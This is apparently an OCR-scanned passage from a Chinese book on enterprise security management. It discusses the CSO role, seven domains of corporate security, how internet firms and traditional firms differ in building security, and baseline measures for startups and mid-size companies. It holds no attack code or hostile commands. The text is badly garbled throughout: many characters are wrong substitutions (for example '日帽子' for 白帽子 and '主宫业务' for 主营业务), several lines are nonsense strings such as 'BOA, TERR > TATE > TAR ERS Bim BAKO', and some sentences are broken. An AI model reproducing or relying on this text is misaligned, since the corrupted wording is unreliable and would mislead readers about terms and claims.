测 、 漏 洞 扫描 等 ， 而 是 从 设计 和 威胁 建 模 的 角度 去 看 整体 和 细 克 的 安 
全 。 这 又 拓展 了 我 从 R&D 的 视角 看 待 以 及 分 析 安 全 问题 的 眼界 。 因 

此 ， 我 可 以 站 在 一 个 较 全 面 、 客 观 、 中 立 的 立场 来 说 安全 ， 我 不 会 说 
某 些 方式 属于 纸上谈兵 ， 也 不 会 把 攻防 兵 得 至 高 无 上 。 


接 下 来 ， 切 入 本 章 正 题 ， 企 业 安 全 是 什么 ? 我 认为 它 可 以 概括 
为 : 从 广义 的 信息 安全 或 狭义 的 网 络 安全 出 发 ， 根 据 企业 自身 所 处 的 
产业 地 位 、IT 总 投入 能 力 、 商 业 模式 和 业务 需求 为 目标 ， 而 建立 的 安 
全 解决 方案 以 及 为 保证 方案 实践 的 有 效 性 而 进行 的 一 系列 系统 化 、 工 
程 化 的 日 闻 安 全 活动 的 集合 。 怎 么 感觉 有 点 咬文嚼字 ? 实际 上 ， 这 里 
面 的 每 一 个 项 都 会 决定 你 的 安全 整体 方案 是 什么 ， 哪 伯 同 是 中 国 互联 
网 TOP10 中 的 公司 ， 安 全 需求 也 完全 不 一 样 。 


有 人 也 许 会 觉得 CSO 干 的 活 有 点 虚 ， 但 几 偏 管理 都 十 纸 上 谈 兵 。 
我 不 直接 回答 这 个 问题 ， 我 只 举 一 个 例子 。 大 多 数 喘 在 这 个 行业 的 人 


都 知道 社工 库 遍 地 都 是 ， 入 侵 者 甚至 站 在 了 大 数据 的 维度 ， 国 内 的 数 
据 库 绝 大 多 数 除了 password 字 段 加 盐 值 存储 之 外 ， 其 余 信息 都 以 明文 
保存 。 而 在 欧美 等 地 隐私 保护 是 有 明确 的 法 律 规定 的 ， 上 映射 到 数据 持 
入 化 这 个 细节 ， 束 是 需要 满足 一 定 强度 以 上 的 加 密 算法 加 密 存 储 。 
CSO 就 是 需要 制定 这 些 策 略 的 人 ， 难 道 说 这 些 都 是 形而上学 无 用 的 安 
全 措施 吗 ? 在 互联 网 公司 ， 安 全 负责 人 会 较 多 地 介入 到 日 常 技术 性 活 
动 中 ， 但 随 着 组 织 规模 的 扩大 和 行政 体系 的 加 深 ,CSO 不 再 可 能 像 日 
帽子 一 样 专注 于 攻防 对 抗 的 细节 ， 这 也 是 一 个 无 法 回避 的 现实 问题 。 
是 不 是 一 定 要 说 出 诸如 CSRF 时 IE 和 其 他 浏览 器 的 区 别 ， 才 算是 合格 的 
CSO? 我 觉得 这 要 看 具体 场景 ， 对 于 国内 排名 TOP10 以 后 的 互联 网 企 
业 ， 我 觉得 这 个 要 求 也 许 勉 强 算 合理 范畴 ， 但 对 于 规模 非常 庞 大 的 企 
业 而 言 ， 这 个 要 求 显 然 太 苛 刻 了 ， 比 如 我 所 在 公司 ，CSO 属 于 法 务 类 
职位 而 不 是 技术 类 职位 。 


不 想 当 将 军 的 士兵 不 是 好 士兵 ， 虽 然 有 人 想 走 纯 技 术 路 线 ， 但 走 
仍 有 很 多 人 想 过 要 当 CSO。CSO 这 个 职位 跟 某 些 大 牛 表达 的 不 完全 一 
致 ， 所 以 下 面 的 篇 幅 会 继续 写 ， 至 少 在 技术 层面 ，CSO 不 会 只 停留 在 
微观 对 抗 上 ， 而 是 会 关注 系统 性 建设 更 多 一 点 。 至 于 跟 董 事 会 建立 沟 
TR, BOAR, BREN AMET, APRS © 


12 ”企业 安全 包括 哪些 事情 


企业 安全 涵 孟 7 大 领域 ， 如 下 所 示 : 


1) 网 络 安全 : 基础 、 狭 义 但 核心 的 部 分 ， 以 计算 机 (PC、 服 务 
器 、 小 型 机 、BYOD.……) 和 网 络 为 主体 的 网 络 安全 ， 主 要 聚焦 在 纯 
技术 层面 。 


2) 平台 和 业务 安全 : 跟 所 在 行业 和 主 营 业务 相关 的 安全 管理 ， 
例如 反 其 诈 ， 不 是 纯 技 术 层 面 的 内 容 ， 是 对 基础 安全 的 拓展 ， 目 的 性 
比较 强 ， 属 于 特定 领域 的 安全 ， 不 算 广义 安全 。 


3) 广义 的 信息 安全 : 以 IT 为 核心 ,包括 广义 上 的 “Information” 载 
体 : 除了 计算 机 数据 库 以 外 ， 还 有 包括 纸 质 文 档 、 机 要 ， 市 场 战 略 规 
划 等 经 营 管理 信息 、 客 户 隐私 、 内 部 邮件 、 会 议 内 容 、 运 营 数 据 、 第 
三 方 的 权益 信息 等 ， 但 凡 你 想得到 的 都 在 其 中 ， 加 上 
泛 “Technology” 的 大 安全 体系 。 


4) IT 风险 管理 、 开 审计 & 内 控 : 对 于 中 大 规模 的 海外 上 市 公司 而 
言 ， 有 诸如 SOX-404 这 样 的 合 规 性 需求 ， 财 务 之 外 束 是 IT， 其 中 所 要 
求 的 在 流程 和 技术 方面 的 约束 性 条 款 跟 信息 安全 管理 重合， 属于 外 围 


和 相关 领域 ， 而 信息 安全 管理 本 身 从 属于 IT 风险 管理 ， 是 CIO 视 角 下 
的 一 个 子 领域 。 


5) 业务 持续 性 管理 : BCM (Business Continuity Management) 不 
属于 以 上 任何 范畴 ， 但 又 跟 每 一 块 都 有 交集 ， 如 果 你 觉得 3) 和 4) 有 
点 虑 ， 那 么 BCM 绝 对 是 面向 实 操 的 领域 。 最 近 ， 有 网易、 中 有 文 付 
宝 、 后 有 携程 ， 因 为 各 种 各 样 的 原因 业务 中 断 ， 损 失 巨 大 都 属于 BCM 
的 范畴 。 有 人 会 问 : 这 跟 安 全 有 什么 关系 ? 安全 是 影响 业务 中 断 的 很 
大 一 部 分 可 能 因素 ， 例 如 DDoS， 入 侵 导 致 必须 关闭 服务 自 检 ， 数 据 丢 
失 ， 用 户 隐私 泄露 等 。 又 会 有 人 间 : 这 些 归 入 安全 管理 即 可 ， 为 什么 
要 跟 BCM 扯 上 关系 ， 做 安全 的 人 可 以 不 管 这 些 吗 ? 管 案 自 然 是 可 以 不 
管 ， 就 好 像 说 : “我 是 个 Java 程 序 员 ，JVM、dalvik (ART) 运行 原理 
不 知道 又 有 什么 关系 ， 完 全 不 影响 我 写 代 码 ! ”事实 上 ，BCM 提 供 了 
另 一 种 更 高 维度 、 更 完整 的 视角 来 看 待业 务 中 断 的 问题 。 对 于 安全 事 
件 ， 它 的 方法 论 也 比 单纯 的 ISMS 更 具有 可 操作 性 ， 对 业务 团队 更 有 亲 
和 力 ， 因 为 你 知道 任何 以 安全 团队 上 自我 为 中 心 的 安全 建设 都 难以 落 
地 ， 最 终 都 不 会 做 得 很 好 。 


6) 安全 品牌 营销 、 渠 道 维护 : CSO 有 时 候 要 做 一 些 务虚 的 事 
情 ， 例 如 为 品牌 的 安全 形象 出 席 一 些 市 场 宣 介 ，Ppresentation。 和 党 统一 
点 讲 ， 现 在 SRC 的 活动 基本 也 属于 这 一 类 。 


7) CXO 们 的 其 他 需求 : 俗称 打杂 。 这 里 你 不 要 理解 为 让 安全 团 
队 去 攻击 一 下 竞争 对 手 的 企业 这 样 人 负面 向 的 事情 ， 而 是 有 很 多 公司 需 
要 做 ,但 运 维 开发 都 不 干 ， 干 不 了 或 者 不 适合 干 的 事情 ， 安 全 团队 能 
力 强 大 时 可 以 承包 下 来 的 部 分 ， 事实 上 我 的 职业 生涯 里 束 做 了 不 少 这 
样 的 事情 。 


基础 的 网 络 安全 是 在 甲 方 的 绝 大 多 数 安全 团队 能 覆盖 的 事情 ， 不 
管 你 的 安全 团队 能 力 如 何 ， 在 公司 里 有 无 影响 力 ， 这 个 是 必须 要 做 
的 ， 因 为 这 是 把 你 招 过 来 的 初衷 。 再 往 后 的 发 展 ， 是 否 止 于 此 则 看 个 
人 的 想法 。 对 于 沉醉 攻防 技术 的 人 ， 其 实 不 需要 往 后 发 展 了 了， 这 些 足 
够 了 。 但 如 末 你 的 安全 团队 富有 活力 和 想法 ， 即 便 你 想 止 于 此 他 们 也 
不 干 ， 把 部 门 做 大 做 强 是 这 些 人 的 愿望 ， 只 有 这 样 才 能 给 安全 团队 更 
大 的 空间 。 这 点 跟 乙 方 是 不 一 样 的 ， 对 于 乙方 而 言 ， 你 可 以 在 某 个 单 
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务 的 需求 ， 即 使 你 成 为 骨灰 级 的 专家 ， 公 司 也 会 对 你 在 某 方面 创新 有 
所 期 待 而 给 你 持续 发 展 的 可 能 性 。 但 是 在 甲 方 ， 安 全 不 是 主 宫 业 务 ， 
归根 结 确 ， 安 全 是 一 个 保值 型 的 后 台 职 能 ， 不 是 一 个 明显 能 创造 收 莅 
的 前 台 职 能 ， 是 一 个 成 本 中 心 而 非 盘 利 中 心 。 安 全 成 本 的 大 小 跟 业 务 
规模 以 及 公司 盘 利 能 力 相 关 ， 公 司 发 展 时 预算 和 人 员 编 制 都 会 增加 ， 
业务 集 涡 时 安全 做 得 再 好 也 不 会 退 加 投入 ， 因 为 无 此 必要 。 反 面 的 例 
TEE: 做 得 不 好 反而 追加 投入 的 ， 那 古 一 种 政治 技巧 而 非 现 实 需 
要 。 在 乙方 ,无 论 你 的 漏洞 挖掘 技能 多 厉害 ， 公 司 都 不 会 跳出 来 说 “你 


CAH RT, PER ANZ BIR” 《通常 情况 下 ) 。 但 
征 在 甲 方 ， 假 设 是 在 一 个 国内 排名 大 约 TOP5 以 后 的 互联 网 企业 ， 养 一 
个 漏洞 挖掘 的 大 牛 也 会 令 人 很 和 奇怪 ， 他 十 在 给 企业 创造 价值 还 是 在 目 
娱 目 乐 是 会 受到 质疑 的 ，CSO 也 会 被 质疑 是 否 化 了 大 价钱 控 来 的 人 不 
征 出 于 业务 需要 而 是 用 于 扩大 目 己 团队 在 业内 影响 力 这 种 务虚 的 事 。 
假如 公司 到 了 Google 这 种 级 别 ， 有 一 大 推 产品， 人鱼 备 大 牛 则 十 顺利 成 
章 的 ， 业 务 上 显然 征 有 这 种 需求 的 。 不 过 还 要 看 产 出 是 否 对 主 襄 业务 
有 帮助 ， 工 作成 末 不 能 转化 为 主 宫 业 务 范 争 力 的 笑 试 性 活动 在 公司 有 
钱 的 时 候 无 所 谓 ， 在 公司 收 紧 腰带 时 则 其 存在 价值 就 有 争议 。 


以 狭义 的 安全 垂直 拓展 去 发 展 甲 方 安全 团队 的 思路 本 质 上 十 个 不 
可 控 的 想法 ， 筹 码 不 在 CSO 手 中 ， 甚 至 不 在 CTO 手 中 ， 而 是 看 主 理 业 
务 的 晴雨 表 ， 申 方 安全 是 要 看 “ 脸 ” 的 ， 这 个 脸 还 不 是 指 跨 部 门 沟通 合 
作 ， 而 是 在 最 原始 的 需求 出 发 点 上 受 限 于 他 们 。 因 此 有 想法 的 安全 团 
队 在 网 络 安全 方面 做 得 比较 成 熟 时 会 转向 平台 和 业务 安全 ， 平 台 和 业 
务 安全 是 一 个 很 大 的 领域 ， 发 展 得 好 ， 安 全 团队 的 规模 会 扩大 2 倍 ，3 
倍 ， 并 且 在 企业 价值 链 中 的 地 位 会 逐渐 前 移 ， 成 为 运 宫 性 质 的 职能 ， 
结合 BCM 真 正成 为 一 个 和 运 维 、 开 发 并 芍 齐 驱 的 大 职能 。 


BCM 在 很 多 人 眼 里 就 是 DR (Disaster Recovery, KEME) , DR 
实 只 是 BCM 中 的 一 个 点 ， 属 于 下 层 分 文 。 不 过 这 对 技术 领域 的 人 而 
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言 是 最 直观 的 部 分 ，DR 在 互联 网 企业 里 由 基础 架构 部 门 或 运 维 主导 。 


N 


不 过 强势 的 甲 方 安全 团队 其 实 也 是 能 参与 其 中 的 ， 而 BCP (Business 

Continuity Plan， 业 务 持续 性 计划 ) 中 的 很 大 一 部 分 跟 安 全 相关 ， 我 之 
前 也 主导 过 BCP&DRP (Disaster Recovery Plan， 灾 难 恢复 计划 ) ， 受 
益 于 绿 盟 那个 年 代 的 教育 不 只 是 攻防 ， 而 是 完整 的 信息 安全 和 风险 管 
理 。 有 兴趣 的 读者 可 以 看 一 下 BS25999 (BCM 的 一 个 标准 ) 。 


广义 的 信息 安全 ， 比 较 直 观 的 映射 就 是 ISO2700x 系 列 ， 行 业 里 的 
绝 大 多 数 人 都 知道 ISO27001 和 BS7799， 这 里 就 不 展开 了 ， 对 真正 有 安 
全 基础 的 人 而 言 ， 都 是 很 简单 的 东西 。 在 企业 里 能 否 做 到 广义 的 安 
全 ， 主 要 看 安全 人 负责 人 和 安全 团队 在 公司 里 的 影响 力 ， 对 上 没有 影响 
力 ， 没 有 诠释 利害 关系 和 游说 的 能 力 ， 自 然 也 就 做 不 到 这 些 。 男 一 方 
面 ， 狭 义 安全 主要 对 接 运 维 开发 等 技术 面 公 司 同僚 ， 但 是 广义 安全 会 
对 接 整 个 公司 的 各 个 部 门 ， 对 于 沟通 面 的 挑战 来 说 ， 又 上 了 一 个 新 的 
台阶 ， 在 我 看 来 这 主要 取决 于 安全 的 领 了 从 人 物 自 己 拥有 什么 样 的 知识 
结构 以 及 他 的 推动 能 力 如何 。 


在 企业 完全 涉及 的 7 大 领域 中 ， 对 于 第 4) 条 ， 如 果 你 所 在 的 组 织 
有 这 方面 的 需求 ， 安 全 职能 目 然 也 会 参与 其 中 ， 古 否 刻意 去 发 展 他 则 
看 自己 需求 ， 对 我 朋友 中 某 些 做 过 IT 治 理 和 风险 咨询 的 人 ， 相 信和 是 有 
能 力 一 并 吃 下 的 ， 如 果 是 技术 派 ， 不 建议 去 等 试 。 


第 6) 条 属于 水 到 渠 成 的 事情 ， 到 了 那 一 步 你 自然 需要 考虑 ， 就 算 
你 不 想 ， 公 司 也 会 计 你 去 ， 就 像 我 现在 明明 做 技术 活 ， 却 也 不 知道 为 


什么 会 跟 这 一 类 事情 挂 上 钩 。 


第 7) 条 有 人 看 时 上 自动 过 滤 了 ， 不 过 安全 负责 人 上 自身 是 否 有 瓶颈 ， 
能 人 否 在 企业 里 发 展 起 来 跟 这 条 有 很 大 关系 ， 甚 公有 很 多 从 1) 发 展 到 
J a 


`3) 的 人 都 需要 借助 7) 这 个 渠道 ， 点 到 为 止 ， 不 多 说 了 。 


对 于 互联 网 公司 ， 我 建议 做 1) 、2) 、5) ; 对 于 传统 行业 ， 我 建 
议 做 1) 、3) 、4) `5) 。 

在 互联 网 行业 ， 我 觉得 安全 工作 可 以 概括 为 以 下 几 个 方面 : 

.信息 安全 管理 (设计 流程 、 整 体 策略 等 ， 这 部 分 工作 约 占 总 量 
的 10%， 比 较 整 体 ， 跨 度 大 ， 但 工作 量 不 多 。 

.基础 架构 与 网 络 安 全 : IDC、 和 生产 网 络 的 各 种 链 路 和 设备 、 服 务 
器 、 大 量 的 服务 端 程序 和 中 间 件 ， 数 据 库 等 ， 偏 运 维 侧 ， 跟 漏洞 扫 
描 、 打 补丁 、ACL、 安 全 配置 、 网 络 和 主机 入 侵 检测 等 这 些 事情 相 关 
性 比较 大 ， 约 占 不 到 30% 的 工作 量 。 

.应 用 与 交付 安全 : 对 各 BG、 事 业 部 、 业 务 线 自 研 的 产品 进行 应 
用 层面 的 安全 评估 ， 代 码 审计 ， 涂 透 测 试 ， 代 码 框 架 的 安全 功能 ， 应 
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掉 、 理 还 乱 ”， 大 部 分 甲 方 团队 都 没有 足够 的 人 力 去 应 付 产 品 线 交 付 的 


数量 庞大 的 代码 ， 没 有 能 力 去 实践 完整 的 SDL， 这 部 分 是 当下 比较 有 
挑战 的 安全 业务 ， 整 体 比 重大 于 30%， 还 在 持续 增长 中 。 
WARE: 上 面 提 到 的 2) ， 包 括 账号 安全 、 交 易 风 控 、 征 信 、 


有 反 价格 息 虫 、 反 作 兹 、 反 bot 程 序 、 反 欺诈 、 反 钓鱼 、 反 垃圾 信息 、 和 与 
情 监 控 (内 容 信 息 安全 ) 、 防 游戏 外 挂 、 打 击 黑色 产业 链 、 安 全 情报 


> 
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后 ， 越 来 越 受 到 重视 的 领域 。 整体 约 占 30% 左 右 的 工作 量 ， 有 的 甚至 
大 过 50%。 这 里 也 已 经 纷纷 出 现 乙 方 的 创业 型 公司 试图 解决 这 些 痛 
点 o 


对 整体 介绍 的 部 分 在 前 面 的 篇 幅 讲 得 比较 多 ， 主 要 目的 是 希望 “ 视 
野 ” 部 分 不 缩水 ， 这 些 概念 在 后 面 篇 幅 都 不 打算 再 展开 了 。 


1.3 互联 网 企业 和 传统 企业 在 安全 建设 中 的 区 别 


总 体 来 看 ， 传 统 企业 偏重 管理 ， 有 人 说 是 “三 分 技术 ， 七 分 管 
E, 而 互联 网 企业 偏重 技术 ， 我 认为 前 面 那 个 三 七 开 可 以 倒 过 来 。 其 
实 这 种 说 法 也 是 不 准确 的 ， 到 发 什 么 算 技术 ， 什 么 算 管 理 ， 这 些 都 没 
有 明确 的 定义 。 安 全 领域 大 部 分 所 谓 管理 不 过 是 组 织 技 术 性 的 活动 而 
已 ， 充 其 量 叫 扩 术 管理 。 


完 说 一 下 传统 企业 和 互联 网 企业 在 安全 建设 需求 上 的 差异 。 
传统 企业 安全 问题 的 特征 如 下 : 

1) IT 资产 相对 固定 。 

2) 业务 变更 不 频繁 。 

3) 网 络 边 界 比较 固定 。 

4) IDC 规 模 不 会 很 大 ， 甚 至 没有 。 


5) 使 用 基于 传统 的 资产 威胁 脆弱 性 的 风险 管理 方法 论 加 上 购买 和 
部 署 商业 安全 产品 (解决 方案 ) 通常 可 以 搞定 。 


大 型 互联 网 企业 需要 应 对 如 下 问题 : 


.海量 IDC 和 海量 数据 。 


-应 对 业务 的 频繁 发 布 和 变更 。 


同时 架构 层面 需要 关注 : 高 性 能 、 高 可 用 性 、 OE) 扩展 性 、 
TCO (ROI) 。 


在 规模 不 大 的 互联 网 公司 ,传统 企业 的 风险 管理 方法 论 是 可 以 沿 
用 的 。 但 在 大 型 互联 网 公司 ， 传 统 企业 的 方法 论 可 能 会 失效 ， 因 为 你 
可 能 连 基础 染 构 上 跑 什 么 业务 都 搞 不 清 ， 想 理 清 所 有 系统 接口 则 的 调 
用 关系 以 及 数据 流 去 检视 设计 风险 以 及 设置 细 粒 度 的 访问 控制 殉 是 件 
不 现实 的 事情 。 产 品 线 极 多 时 ， 业 内 没有 任何 一 个 团队 敢 说 目 己 有 能 
力 文 持 全 产品 线 ， 对 于 高 速 发 展 的 业务 ， 当 你 理 清 了 你 想 要 的 时 ， 说 
不 定 染 构 勾 发 生变 化 了 。 只 有 对 占 公 司 整体 营 收 比较 主要 的 以 及 培育 
性 质 的 战略 级 的 核心 业务 ， 才 有 必要 去 深入 调研 并 随 之 更 新 ， 其 他 的 
主要 依靠 目 动 化 手段 。 


1. 传 统 企 业 的 安全 建设 


从 安全 建设 上 来 看 ， 传 统 企 业 的 安全 建设 是 : 在 边界 部 署 硬件 防 
火 墙 、IPSIDS、WAF、 商 业 扫 描 器 、 人 堡垒 机 ， 在 服务 器 上 安装 防 病毒 
软件 ， 集 成 各 种 设备 、 终 端的 安全 日 志 建 设 SOC， 当 然 购买 的 安全 硬 


件 设 备 可 能 远 不 止 这 些 。 在 管理 手段 上 比较 重视 ISMS (信息 安全 管理 
体系 ) 的 建设 ， 重 视 制 度 流程 、 重 视 审 计 ， 有 些 行业 也 必须 做 等 级 保 
护 以 及 满足 大 量 的 合 规 性 需求 。 


2. 互 联网 企业 的 安全 建设 


互联 网 可 分 为 生产 网 络 和 办 公 网 络 ， 即 便 最 近 Google 声 称 取消 内 
网 也 是 针对 办 公 网 络 而 非 生 产 网 络 。 互 联网 行业 的 大 部 分 安全 建设 都 
围绕 生产 网 络 ， 而 办 公 网 络 的 安全 通常 只 占 整 体 的 较 小 比重 。 但 是 时 
些 传统 企业 可 能 完全 没有 生产 网 络 而 只 有 办 公 网 络 ， 那 么 网 络 安全 也 
束 变 成 办 公 网 络 的 网 络 安全 。 但 我 推测 ， 随 着 社会 “互联 网 +” 进 程 的 加 
速 ， 很 多 传统 企业 也 会 有 自己 的 生产 网 络 ， 最 终 都 变 成 和 互联 网 公司 
一 样 的 形态 。 所 以 对 于 那些 在 给 传统 企业 客户 提供 咨询 和 解决 方案 的 
乙方 的 工程 师 ， 如 果 不 学 习 互 联网 安全 ， 也 信 早 会 陷入 困境 。 


互联 网 企业 的 生产 网 络 中 ， 安 全 解决 方案 基本 上 都 是 以 攻防 为 艳 
BOA, TERR > TATE > TAR ERS Bim BAKO ° 
互联 网 公司 基本 不 太 会 考虑 等 傈 、 合 规 这 种 形 而 上 的 需求 ， 只 从 最 实 
际 的 角度 出 发 ， 这 一 点 是 比 传统 企业 更 务实 的 地 方 。 曾 过 到 过 一 个 例 
子 ， 说 要 在 服务 右上 装 防 病毒 软件 ， 推 测 束 知道 古 传 统 企业 的 思路 ， 
不 是 没有 真正 实践 过 互联 网 企业 安全 就 是 没 税 业务 线 挑战 过 。 在 大 型 
互联 网 企业 ， 仪 是 性 能 损耗 、 运 维 成 本 和 软件 成 本 这 几 条 就 能 分 分 钟 
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很 多 标准 说 到 故 部 是 各 厂 HLSW, BHA, AMPA 
产品 销售 的 代言 白皮书 ， 并 不 是 完全 站 在 建设 性 的 角度 的 ， 作 为 乙方 
给 政 企 客户 写 解 决 方案 建议 书 无 可 厚 非 ， 但 在 互联 网 公司 做 企业 安 

全 ， 生 搬 硬 套 某 些 标准 束 会 闸 出 笑话 来 。 


3. 从 量变 到 质变 


对 于 超过 一 定 规模 的 大 型 互联 网 公司 ， 其 IT 建设 开始 进入 自己 发 
明 轮 子 的 时 代 ， 安 全 解决 方案 开始 局 部 或 进入 全 部 目 研 的 时 代 。 例 如 
不 会 购买 硬件 防火 墙 ， 而 是 用 服务 器 +Netfilter 的 方式 自 建 ， 不 会 部 署 
硬件 IDS/IPS， 而 是 用 其 他 方式 来 解决 这 个 问题 。 其 实 不 难 理解 ， 规 模 
小 的 时 候 买 台 硬 件 防火 墙 放 在 最 前 面 ， 省 事 。 但 是 规模 大 了 ， 难 道 去 
买 1000 台 硬 防 放 在 IDC 机 房 ? 成 本 上 就 没 法 通过 批准 。 再 说 ， 基 于 分 
布 式 系统 的 CAP 理 论 和 Map-Reduce 衍 生 的 一 系列 互联 网 架构 ， 本 质 上 
都 具有 “无 限 ” 的 扩展 能 力 ， 而 对 于 传统 的 硬件 盒子 式 的 解决 方案 ， 其 
设计 大 多 源 于 对 小 型 网 络 体系 架构 的 理解 ， 基 本 不 具备 扩展 能 力 ， 完 
全 不 能 适应 大 规模 的 互联 网 架构 。 在 这 种 情况 下 甲 方 安全 团队 上 自己 动 
手 去 打造 完全 围绕 自 号 业务 的 解决 方案 也 就 成 必然 趋势 。 


4. 大 型 互联 网 企业 安全 建设 的 方法 论 
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于 普通 中 低 端 硬件 之 上 (PCHRA ae Be ARE) + 大 数据 机 器 学 习 的 
方式 ， 是 目前 大 型 互联 网 公司 用 来 应 对 业务 持续 性 增长 的 主流 安全 解 
决 方案 。 是 否 真 的 到 了 机 志学 习 阶 段 这 个 有 点 难说 ， 但 是 安全 进入 大 
数据 时 代 则 有 是 肯定 的 。 


与 办 公 网 络 和 雇员 信息 安全 管理 相 比 ， 互 联网 公司 的 文化 比较 开 
放 ， 一般 不 太 会 维持 激进 的 安全 政策 (对 雇员 做 太 多 信息 安全 方面 的 
管制 和 限制 ，， 这 点 也 是 跟 传统 企业 差别 比较 大 的 地 方 。 


也 有 一 些 灰 色 地 市 ， 比 如 TCO 较 高 的 安全 方案 ， 一 开始 没 感 觉 ， 
但 实质 十 吸毒 ， 随 着 IDC 的 规模 扩张 ， 安 全 的 成 本 越 来 越 大 ， 最 后 被 
目 己 巨大 的 成 本 “ 毒 死 ”。 对 于 做 惯 传统 行业 解决 方案 且 客 户 手 里 都 有 
大 把 预算 的 顾问 来 说 ， 对 这 一 点 是 没 感觉 的 ， 几 千 万 元 的 安全 整体 方 
案 信 手 牛 来 ， 但 是 放 到 互联 网 中 ， 一 旦 业务 规模 成 倍增 长 ， 这 些 方案 
最 终 都 会 走 入 死胡同 。 不 止 是 成 本 ， 如 琳 不 能 做 到 兼顾 和 窒 主 的 性 能 ， 
安全 架构 随 整 个 业务 架构 水 平 扩 展 ， 保 证 高 可 用 性 ， 最 终 安 全 措施 都 
会 走 进 死 胡同 。 


以 安全 集成 为 目 映 职业 亮点 的 人 如 采 不 积极 学 习 ， 会 有 很 大 贬值 
风险 ， 因 为 以 后 不 需要 堆 硬 件 盒 子 式 的 解决 方案 了 ， 束 算 堆 也 不 再 是 
原来 的 堆 法 。 


14 不 同 规模 企业 的 安全 管理 


1. 创 业 型 公司 


对 于 创业 型 公司 而 言 ， 安 全 不 是 第 一 位 的 ， 我 在 唱 反 调 吗 ? 应 该 
只 是 大 实话 而 已 。 安 全 建设 的 需求 应 该 是 : 保障 最 基本 的 部 分 ， 追 求 
最 高 性 价 比 ， 不 求 大 而 全 ， 映 里 到 技术 实现 应 该 是 做 如 下 事情 : 


-基本 的 补丁 管理 要 做 。 
漏洞 管理 要 做 。 
3~L7 的 基本 的 访问 控制 。 


没有 弱 密 码 ， 管 好 密码 。 


.账号 认证 鉴 权 不 求 各 种 基于 条 件 的 高 大 上 的 实时 风 控 ， 但 求 基 本 
功能 到 位 。 


办公 网 络 做 到 统一 集中 管理 (100 人 以 上 规模 ) 和 企业 防 病毒 ， 
几 个 人 的 话 ， 束 完全 不 用 考虑 了 ，APT 什 么 的 就 听 一 听 拉 倒 了 。 


流程 什么 的 吏 没 必要 去 搞 了 ， 有 什么 需求 ， 口 头 约束 一 下 。 


- 找 两 篇 用 到 的 开发 语言 的 安全 编程 规范 给 程序 员 看 看 ， 安 全 专家 
们 说 的 SDL 束 不 要 去 追求 了 ， 那 个 东西 没有 一 扒 安 全 “ 准 ? 专 家 玩 不 起 
Se 


系统 加 固 什么 的 ， 网 上 找 两 篇 文章 对 一 下 ， 确 你 没有 root 直 接 跑 
进程 ，chmod 777， 管 理 后 人 台 弱 密码 对 外 这 种 低级 错误 ， 当 然 有 进一步 
需求 ， 也 可 以 参考 后 面 的 技术 篇 中 的 措施 。 


实惠 一 点 的 ， 找 个 靠 谱 的 日 帽子 兼职 做 一 下 测试 ， 或 者 众 测 也 


征 不 是 觉得 简陋 了 一 总 ? 我 估计 很 多 乙方 提供 的 服务 除了 卖 产 品 
之 外 也 不 会 比 这 个 效果 更 好 了 “。 不 过 ， 现 在 不 少 创业 公司 十 拿 了 不 小 
的 风 投 的 ， 也 没 那 么 寒酸 。 男 外 一 个 很 重要 的 特征 是 ， 创 业 公司 基本 
都 上 公有 云 了 ， 不 会 自己 再 去 折腾 IDC 那 点 事 ， 所 以 相对 而 言 以 上 措 
施 中 的 一 部 分 可 以 等 价 于 : 


1) 使 用 云 平台 提供 的 安全 能 力 ， 包 括 各 种 抗 DDoS、WAF ` HIDS 


2) 使 用 市 场 中 第 三 方 安 全 厂商 提供 的 安全 能 力 。 


具体 怎么 选 怎么 用 吏 不 展开 讲 了 ， 不 过 不 要 因为 迷信 云 平 台 关 于 
安全 能 力 的 广告 而 目 己 不 再 去 设防 ， 毕 竟 针 对 租户 级 的 通用 型 的 安全 
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2. 大 中 型 企业 


这 个 层次 对 应 市 场 上 大 多 数 公 司 的 安全 需求 ， 它 的 典型 特征 是 ， 
业务 营 收 的 持续 性 需要 安全 来 保障 。 公 司 愿意 在 IT 安全 上 投入 固定 的 
成 本 ， 通 常 小 于 IT 总 投入 的 10%， 不 过 这 已 经 不 错 了 。 这 时 候 开 始 有 
专职 的 安全 人 员 或 安全 团队 ， 建 设 上 重视 效果 和 ROI， 会 具备 初步 的 
纵深 防御 能 力 。 对 应 技术 上 的 需求 为 : 


1.2~1.7 中 的 每 一 层 拥有 完整 的 安全 设计 。 


-对 所 有 的 服务 种 、PC 终 疹 、 移 动 设备 ， 具 有 统一 集中 的 状态 感 
知 、 安 全 检测 及 防护 能 


应 用 层面 细 粒 度 控制 。 


全 流量 入 侵 检 测 能 


-无 死角 1 天 漏洞 发 现 能 力 。 
在 安全 等 级 较 高 的 区 域 建立 纵深 防御 和 一 定 的 0 天 发 现 能 力 。 


初 具 规 模 的 安全 专职 团队 。 


-对 应 用 交付 有 目 主 的 评估 和 修补 能 


-从 IT 服务 层面 建立 必要 的 流程 、 业 务 持续 性 以 及 风 探 应急 措施 ° 


.对 业务 安全 形成 目 己 的 风 控 及 安全 管理 方法 论 。 


.将 难以 自己 实现 的 部 分 外 包 。 


好 像 跟 前 面 的 描述 比 一 下 子 抽 象 了 ? 是 的 ， 这 个 层级 的 安全 需求 
没 办 法 很 具体 地 量化 。 不 同 的 业务 模式 对 应 的 安全 实现 还 是 有 很 大 的 
不 同 ， 加 上 这 个 区 间 里 的 公司 营 收 规模 可 以 差 很 大 ， 对 应 的 安全 投入 
也 可 以 差 很 多 。 那 什么 样 的 公司 归 入 这 个 区 间 呢 ?比如 四 大 行 ， 国 内 
TOP10 其 至 TOP5 以 后 的 互联 网 公司 ， 大 量 的 电信 、 人 金融、 政府 、 能 源 
等 企业 都 属于 这 个 区 间 ， 但 我 为 什么 不 把 BAT 归 入 这 个 区 间 ? 这 样 的 
分 类 己 不 是 不 科学 ? 我 之 所 以 这 样 分 类 完全 是 从 安全 建设 的 复杂 上 度 上 
去 考量 的 ， 而 不 是 从 安全 建设 的 资金 投入 上 去 归 类 的 。 很 多 行业 ( 比 
如 金融 ) 的 安全 投入 很 大 ， 但 这 些 解 决 方案 大 都 是 靠 花 钱 就 能 买 来 
的 ， 而 BAT 的 方案 花 钱 不 一 定 能 买 得 到 ， 很 多 都 需要 自己 动手 去 打 
造 ， 对 安全 团队 的 定位 、 能 力 和 需求 完全 不 一 样 。 那 BAT 以 外 较 大 的 
互联 网 公司 呢 ? 我 觉得 他 们 会 玩 些 各 自 特 点 的 小 花样 ， 但 是 不 会 进入 
大 范围 的 复杂 的 安全 建设 ， 这 是 由 公司 的 整体 面 和 业务 决定 的 ， 不 需 
要 过 分 保障 和 超前 业务 的 安全 建设 。 


再 往 上 一 层 是 大 型 互联 网 企业 。 


